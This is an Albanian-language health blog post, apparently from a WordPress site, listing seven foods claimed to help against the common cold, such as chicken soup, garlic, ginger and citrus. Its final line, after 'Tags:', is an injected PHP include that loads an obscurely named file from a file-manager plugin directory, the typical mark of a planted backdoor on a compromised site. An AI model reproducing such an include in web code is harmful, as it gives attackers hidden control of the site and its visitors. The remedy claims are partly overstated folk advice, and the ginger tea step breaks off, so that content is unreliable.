Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

7 Ushqime shëruese për të luftuar ftohjen e zakonshme !?

7 Ushqime shëruese për të luftuar ftohjen e zakonshme !?


7 Ushqime shëruese për të luftuar ftohjen e zakonshme 

1. Supë pule
pse: Quhet edhe Penicilina e natyrës dhe është në krye të
listës për fuqitë e saj kurative. Supa e nxehtë e
pules ndihmon pastrimin e rrugëve bllokuara të frymarrjes.

2. Ushqimet e nxehta dhe erëzat
Specat djegës apo salcë erëzash ndihmon lehtësimin e kongjestionit . Ziej ushqime etnike që përmbajnë
këto përbërës, ose thjesht të shtoni një
salcë me erëza në ushqime për ekstra energji.

3. Hudhëra
Kjo kokërr aromatike përmban një
agjent aromatizues të quajtur alliin e cila
vepron si një dekongjestant. Hudhra
besohet që gjithashtu vepron si një antioxidant dhe shkatërron radikalët e lira, e qe jane molekulat e oksigjenit aktive
që dëmtojn qelizat.

4. Lëngje
Për të ju mbajtur juve të hidratuar.

5. Fruta agrume
Konsumo prej frutave agrume për të rritur
marrjen tuaj të vitaminës C. Pini
lëng portokalli për mëngjes,
një gjysmë grejpfrut, ose shtoni
rriska mandarine në një sallatë te drekës. Marrja e rritur
sasisë vitaminës C është veçanërisht
e rëndësishme nëse pini duhan, se
pirja e duhanit i rrite te dytë, rrezikun
e marrjes të një ftohure dhe nevojës trupit tuaj
për këtë vitaminë mbrojtëse.

6. Xhenxhefil
Shumë njerëz gjejnë rrënjë xhenxhefil të freskët
që ndihmon në trajtimin e kollitjes dhe
etheve ngaqë shpesh ethet shoqërojnë ftohjet
dhe gripin. Provoni duke bërë një çaj xhenxhefil:

7. Vitamina C – burime e saj
Fruta agrume nuk janë vetëmit ushqime që kanë vitaminë C. Patatja, specat jeshile, dredhëza (luleshtrydhe) dhe
ananasi mund të ndihmoj ushqimit tuaj përditshëm për të luftuar ftohjen.

Përshtatën: HaNa,

Tags:
@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";